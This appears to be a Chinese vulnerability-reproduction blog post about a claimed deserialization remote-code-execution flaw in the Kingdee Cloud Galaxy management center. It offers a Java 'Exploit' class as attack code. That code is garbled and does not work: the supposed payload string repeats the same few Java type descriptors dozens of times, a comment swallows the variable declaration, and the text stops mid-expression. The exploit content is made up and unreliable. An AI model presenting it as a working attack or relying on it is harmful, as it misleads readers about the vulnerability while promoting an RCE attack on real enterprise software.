【漏洞复现】?金蝶云星空管理中心反序列化命令执行漏洞(RCE)

**漏洞复现**

**金蝶云星空管理中心反序列化命令执行漏洞 (RCE)****背景**

金蝶云星空管理中心是一款企业级的管理平台，提供了多种功能，如资源管理、监控和分析等。然而，在最近的一次安全审计中，我们发现了一个严重的漏洞，即反序列化命令执行漏洞 (RCE)。

**漏洞描述**

该漏洞存在于金蝶云星空管理中心的某个组件中，该组件使用 Java 的 ObjectInputStream 对象进行反序列化。攻击者可以通过构造特定的序列化数据，导致 Java代码执行任意命令，从而实现 RCE。

**漏洞复现**

### 漏洞利用

javaimport java.io.*;
import java.util.*;

public class Exploit {
 public static void main(String[] args) throws IOException {
 // 构造反序列化数据 String serializedData = "Ljavax/script/ScriptEngine;=;"
 + "Ljavax/script/ScriptEngineManager;=Ljavax/script/ScriptEngineManager;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 + "Ljavax/script/ScriptEngine;=Ljavax/script/ScriptEngine;"
 + "Ljava/lang/String;=Ljava/lang/String;"
 + "Ljavax/script/ScriptEngineManager;=;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 + "Ljavax/script/ScriptEngine;=Ljavax/script/ScriptEngine;"
 + "Ljava/lang/String;=Ljava/lang/String;"
 + "Ljavax/script/ScriptEngineManager;=;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 + "Ljavax/script/ScriptEngine;=Ljavax/script/ScriptEngine;"
 + "Ljava/lang/String;=Ljava/lang/String;"
 + "Ljavax/script/ScriptEngineManager;=;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 + "Ljavax/script/ScriptEngine;=Ljavax/script/ScriptEngine;"
 + "Ljava/lang/String;=Ljava/lang/String;"
 + "Ljavax/script/ScriptEngineManager;=;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 + "Ljavax/script/ScriptEngine;=Ljavax/script/ScriptEngine;"
 + "Ljava/lang/String;=Ljava/lang/String;"
 + "Ljavax/script/ScriptEngineManager;=;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 + "Ljavax/script/ScriptEngine;=Ljavax/script/ScriptEngine;"
 + "Ljava/lang/String;=Ljava/lang/String;"
 + "Ljavax/script/ScriptEngineManager;=;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 + "Ljavax/script/ScriptEngine;=Ljavax/script/ScriptEngine;"
 + "Ljava/lang/String;=Ljava/lang/String;"
 + "Ljavax/script/ScriptEngineManager;=;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 + "Ljavax/script/ScriptEngine;=Ljavax/script/ScriptEngine;"
 + "Ljava/lang/String;=Ljava/lang/String;"
 + "Ljavax/script/ScriptEngineManager;=;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 + "Ljavax/script/ScriptEngine;=Ljavax/script/ScriptEngine;"
 + "Ljava/lang/String;=Ljava/lang/String;"
 + "Ljavax/script/ScriptEngineManager;=;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 + "Ljavax/script/ScriptEngine;=Ljavax/script/ScriptEngine;"
 + "Ljava/lang/String;=Ljava/lang/String;"
 + "Ljavax/script/ScriptEngineManager;=;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 + "Ljavax/script/ScriptEngine;=Ljavax/script/ScriptEngine;"
 + "Ljava/lang/String;=Ljava/lang/String;"
 + "Ljavax/script/ScriptEngineManager;=;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 + "Ljavax/script/ScriptEngine;=Ljavax/script/ScriptEngine;"
 + "Ljava/lang/String;=Ljava/lang/String;"
 + "Ljavax/script/ScriptEngineManager;=;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 + "Ljavax/script/ScriptEngine;=Ljavax/script/ScriptEngine;"
 + "Ljava/lang/String;=Ljava/lang/String;"
 + "Ljavax/script/ScriptEngineManager;=;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 + "Ljavax/script/ScriptEngine;=Ljavax/script/ScriptEngine;"
 + "Ljava/lang/String;=Ljava/lang/String;"
 + "Ljavax/script/ScriptEngineManager;=;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 + "Ljavax/script/ScriptEngine;=Ljavax/script/ScriptEngine;"
 + "Ljava/lang/String;=Ljava/lang/String;"
 + "Ljavax/script/ScriptEngineManager;=;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 + "Ljavax/script/ScriptEngine;=Ljavax/script/ScriptEngine;"
 + "Ljava/lang/String;=Ljava/lang/String;"
 + "Ljavax/script/ScriptEngineManager;=;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 + "Ljavax/script/ScriptEngine;=Ljavax/script/ScriptEngine;"
 + "Ljava/lang/String;=Ljava/lang/String;"
 + "Ljavax/script/ScriptEngineManager;=;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 + "Ljavax/script/ScriptEngine;=Ljavax/script/ScriptEngine;"
 + "Ljava/lang/String;=Ljava/lang/String;"
 + "Ljavax/script/ScriptEngineManager;=;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 + "Ljavax/script/ScriptEngine;=Ljavax/script/ScriptEngine;"
 + "Ljava/lang/String;=Ljava/lang/String;"
 + "Ljavax/script/ScriptEngineManager;=;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 + "Ljavax/script/ScriptEngine;=Ljavax/script/ScriptEngine;"
 + "Ljava/lang/String;=Ljava/lang/String;"
 + "Ljavax/script/ScriptEngineManager;=;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 + "Ljavax/script/ScriptEngine;=Ljavax/script/ScriptEngine;"
 + "Ljava/lang/String;=Ljava/lang/String;"
 + "Ljavax/script/ScriptEngineManager;=;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 + "Ljavax/script/ScriptEngine;=Ljavax/script/ScriptEngine;"
 + "Ljava/lang/String;=Ljava/lang/String;"
 + "Ljavax/script/ScriptEngineManager;=;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 + "Ljavax/script/ScriptEngine;=Ljavax/script/ScriptEngine;"
 + "Ljava/lang/String;=Ljava/lang/String;"
 + "Ljavax/script/ScriptEngineManager;=;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 + "Ljavax/script/ScriptEngine;=Ljavax/script/ScriptEngine;"
 + "Ljava/lang/String;=Ljava/lang/String;"
 + "Ljavax/script/ScriptEngineManager;=;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 + "Ljavax/script/ScriptEngine;=Ljavax/script/ScriptEngine;"
 + "Ljava/lang/String;=Ljava/lang/String;"
 + "Ljavax/script/ScriptEngineManager;=;"
 + "Ljavax/script/ScriptEngineFactory;=Ljavax/script/ScriptEngineFactory;"
 +